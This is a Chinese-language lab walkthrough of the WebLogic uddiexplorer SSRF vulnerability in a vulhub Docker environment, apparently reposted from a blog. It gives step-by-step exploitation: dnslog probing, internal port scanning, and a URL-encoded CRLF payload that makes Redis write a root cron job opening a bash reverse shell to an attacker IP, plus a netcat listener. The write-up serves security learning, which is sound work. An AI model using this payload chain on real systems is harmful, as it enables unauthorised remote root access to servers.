weblogic-SSRF漏洞
目录[*]漏洞测试
[*]注入HTTP头,利用Redis反弹shell
[*]redis不能启动问题解决
Path:vulhub/weblogic/ssrf
编译及启动测试环境
docker compose up -dWeblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件
访问http://127.0.0.1:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用
https://img-blog.csdnimg.cn/img_convert/b59fd564d50d42397f311ac2068246ad.png
点击Search Public Registries
https://img-blog.csdnimg.cn/img_convert/592c21c219416a2f9169184020dafb0e.png
来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp页面
https://img-blog.csdnimg.cn/img_convert/0ae4644fd155df938b36d77bb366671b.png
漏洞测试
打开BurpSuite测试,点击Search按钮
Ctrl+r发送到Repeater模块,观察数据包
https://img-blog.csdnimg.cn/img_convert/b05b5d94dba863357345e882a045ce86.png
根据数据包的响应信息,可以猜测operator参数后面可以跟一个url地址
利用dnslog平台测试,生成一个域名
https://img-blog.csdnimg.cn/img_convert/89b98d0d603da05af3b15b13bd422744.png
https://img-blog.csdnimg.cn/img_convert/5ca3f8dd8c7078b2090265130997c37e.png
成功解析到,说明operator后面 可以做url地址请求,说明存在SSRF 漏洞
https://img-blog.csdnimg.cn/img_convert/8daa25aeda78f140d3057f7ce824916d.png
访问一个可以访问的IP:PORT,如http://127.0.0.1:80
https://img-blog.csdnimg.cn/img_convert/d4c300680e91d248f7931bc0e698b1dc.png
发现80端口没有开放
在访问7001端口,
https://img-blog.csdnimg.cn/img_convert/08e752f11be8cae3e0bfcc3de11a0547.png
通过错误的不同,即可探测内网状态。
环境是在docker上启动的,(docker环境的网段一般是172.*)
https://img-blog.csdnimg.cn/img_convert/ee11fbd62f26ed9cd4bb8d4cebd60e64.png
注入HTTP头,利用Redis反弹shell
发送三条redis命令,将弹shell脚本写入/etc/crontab:
反弹到kali上
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.80.141/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save进行url编码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave注意,换行符是“\r\n”,也就是“%0D%0A”。
将url编码后的字符串放在ssrf的域名后面,发送:
http://172.19.0.2:6379/saury%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Asaurykali开启监听:
nc -lvvp 21bp发送请求
https://img-blog.csdnimg.cn/img_convert/33d35dd7853907d0ead0f773e021a10f.png
等待计划任务生效
https://img-blog.csdnimg.cn/img_convert/cb826ff9b4a03725706c7c91f7e5f7bb.png
成功拿到shell
redis不能启动问题解决
在使用sudo docker-compose up -d启动环境的时候,只启动了weblogic,没有启动redis
https://img-blog.csdnimg.cn/img_convert/6cafcbaee9eed93a9ea4f4fc4e63024d.png
修改如下配置
vim /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="vsyscall=emulate"https://img-blog.csdnimg.cn/img_convert/a9f8bccceba716441c9e51422f81b5a1.png
:wq保存后,命令行运行update-grub
reboot重启,redis成功启动
解决方法来自:https://blog.csdn.net/weixin_43886198/article/details/111144854
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]